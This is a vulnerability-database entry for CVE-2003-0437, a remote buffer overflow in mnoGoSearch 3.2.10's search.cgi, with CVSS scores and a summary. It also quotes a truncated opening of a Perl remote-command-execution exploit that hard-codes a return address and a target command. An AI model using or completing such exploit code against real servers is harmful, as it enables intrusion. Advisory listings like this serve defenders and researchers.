7.5
CVSSv2

CVE-2003-0437

Published: 24/07/2003 Updated: 10/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in search.cgi for mnoGoSearch 3.2.10 allows remote malicious users to execute arbitrary code via a long tmplt parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mnogosearch mnogosearch 3.2.10

Exploits

#!/usr/bin/perl # # [ reloaded ] # Remote Exploit for mnoGoSearch 3120 that performs # remote command execution as the webserver user id # for linux ix86 # by pokleyzz # use IO::Socket; $host = "127001"; $cmd = "ls -la"; $searchpath = "/cgi-bin/searchcgi"; $rawret = 0xbfff105c; $ret = ""; $suffsize = 0; $port = 80; my $conn; if ($ARGV ...